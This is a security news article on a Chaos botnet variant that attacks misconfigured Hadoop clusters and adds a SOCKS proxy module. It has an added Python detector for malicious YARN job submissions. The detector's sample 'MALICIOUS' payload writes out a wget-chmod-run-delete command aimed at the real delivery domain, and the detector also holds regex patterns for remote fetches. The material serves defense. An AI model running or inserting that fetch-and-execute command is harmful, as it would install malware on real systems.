New Chaos Variant Targets Misconfigured Cloud Deployments, Adds SOCKS Proxy
Chaos Botnet Evolves: New Variant Targets Cloud Infrastructure with SOCKS Proxy Capabilities
TL;DR
The notorious Chaos malware has evolved to target misconfigured cloud deployments, moving beyond its traditional focus on routers. A new variant identified by Darktrace features a SOCKS proxy module, signaling a shift toward monetizing compromised infrastructure as a proxy service while stripping away older SSH propagation methods.
Introduction
The threat landscape for cloud infrastructure is facing a new challenge as the Chaos malware, a cross-platform botnet first documented in late 2022, undergoes a significant structural transformation. Originally known for targeting edge devices and routers, recent telemetry indicates that Chaos is now aggressively pursuing misconfigured cloud environments, specifically targeting services like Apache Hadoop.
According to a recent report from Darktrace, this evolution marks a strategic shift in how the botnet expands its infrastructure and monetizes its victims.
From Routers to the Cloud
Chaos was first identified by Lumen Black Lotus Labs in September 2022. It was initially described as an evolution of the Kaiji malware, known for targeting Docker instances. While early versions of Chaos specialized in infecting Windows and Linux environments to launch DDoS attacks and mine cryptocurrency, the latest variant observed by Darktrace shows a refined focus.
In a recent attack caught by Darktrace honeypots, threat actors targeted a deliberately misconfigured Hadoop instance. The attack chain unfolded as follows:
- Initial Access: An HTTP request was sent to the Hadoop deployment to create a new application.
- Payload Delivery: The application embedded shell commands to pull a Chaos agent binary from the malicious domain pan.tenire[.]com.
- Persistence & Execution: The attackers modified file permissions (chmod 777) to ensure execution and subsequently deleted the binary from the disk to minimize forensic footprints.
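As an added example (not code from the article or from Darktrace), the following Python checker flags Hadoop YARN application submissions that match the chain above: a remote fetch, a permission change that makes the fetched file executable, and removal of the file afterwards. It assumes the ResourceManager REST API's `am-container-spec.commands.command` payload layout, and the two sample payloads are constructed for illustration.

```python
import json
import re
from urllib.parse import urlparse

# Indicator taken from the article (defanged there as pan.tenire[.]com).
KNOWN_BAD_DOMAINS = {"pan.tenire.com"}

# Command-string patterns matching the observed chain: remote fetch,
# executable/world-writable permission change, and deletion of the payload.
FETCH_RE = re.compile(r"\b(?:curl|wget)\b[^;&|]*?(https?://[^\s'\"]+)", re.I)
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b")
RM_RE = re.compile(r"\brm\s+(?:-[a-z]+\s+)*(\S+)")


def extract_commands(submission: dict) -> list[str]:
    """Return the command string(s) of a YARN app submission.
    Assumed layout: am-container-spec.commands.command (string or list)."""
    spec = submission.get("am-container-spec", {})
    cmd = spec.get("commands", {}).get("command", [])
    return [cmd] if isinstance(cmd, str) else list(cmd)


def analyze_submission(body: str) -> list[str]:
    """Return detection reasons for one submission body; empty means clean."""
    reasons = []
    try:
        submission = json.loads(body)
    except json.JSONDecodeError:
        return ["unparseable submission body"]
    for command in extract_commands(submission):
        for url in FETCH_RE.findall(command):
            host = urlparse(url).hostname or ""
            if host in KNOWN_BAD_DOMAINS:
                reasons.append(f"fetch from known-bad domain {host}")
            else:
                reasons.append(f"remote fetch from {host}")
        if CHMOD_RE.search(command):
            reasons.append("permission change making fetched file executable")
        m = RM_RE.search(command)
        if m and ("chmod" in command or FETCH_RE.search(command)):
            reasons.append(f"fetched payload removed after execution ({m.group(1)})")
    return reasons


# Constructed sample payloads (not captured from the incident).
BENIGN = json.dumps({"application-name": "wordcount", "am-container-spec": {
    "commands": {"command": "{{JAVA_HOME}}/bin/java -cp app.jar WordCount"}}})
MALICIOUS = json.dumps({"application-name": "job", "am-container-spec": {
    "commands": {"command": "wget http://pan.tenire.com/x -O /tmp/x; "
                            "chmod 777 /tmp/x; /tmp/x; rm -f /tmp/x"}}})
```

Run it against submissions captured by a reverse proxy or the ResourceManager's own request logging; a non-empty result is a candidate alert, not a verdict.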
Technical Overhaul: The SOCKS Proxy Addition
The 64-bit ELF binary discovered in recent campaigns is not just a port of the old code; it is a restructured version of Chaos.
What’s New:
- SOCKS Proxy Feature: The most significant addition is a proxy module that allows attackers to funnel malicious traffic through the compromised host. This obscures the origin of secondary attacks and makes detection significantly more difficult for defenders.
- Refactored Code: Several functions previously inherited from the Kaiji malware have been rewritten or heavily refactored.
What’s Gone:
- Removed Propagation Methods: Interestingly, the developers have removed functions that previously allowed the malware to spread via SSH brute-forcing and the exploitation of router-specific vulnerabilities.
Attribution and Links to Known Groups
While the specific identity of the operators remains unconfirmed, researchers noted the presence of Chinese language characters and the use of China-based infrastructure.
Intriguingly, the delivery domain (pan.tenire[.]com) has a history. It was previously associated with the Chinese cybercrime group Silver Fox during "Operation Silk Lure" in October 2025 (as documented by Seqrite Labs). In that campaign, the infrastructure was used to deliver ValleyRAT malware via phishing.
The Shift to Proxy-as-a-Service
The inclusion of proxy capabilities suggests a broader trend in the botnet ecosystem. Threat actors are moving beyond simple DDoS-for-hire or cryptocurrency mining. By integrating SOCKS proxies, groups behind botnets like Chaos and AISURU can monetize their "zombie" networks by selling access to the infrastructure for other cybercrimes, effectively acting as a privacy layer for other attackers.
Conclusion
The evolution of Chaos demonstrates that legacy botnets are not stagnant. They are being actively updated to exploit the most lucrative targets available: the cloud. As Darktrace noted, the shift from DDoS-centric features to proxy services highlights a growing risk where organizations' own infrastructure can be weaponized as an anonymization tool for global cybercrime.
Source: The Hacker News - New Chaos Variant Targets Misconfigured Cloud Deployments, Adds SOCKS Proxy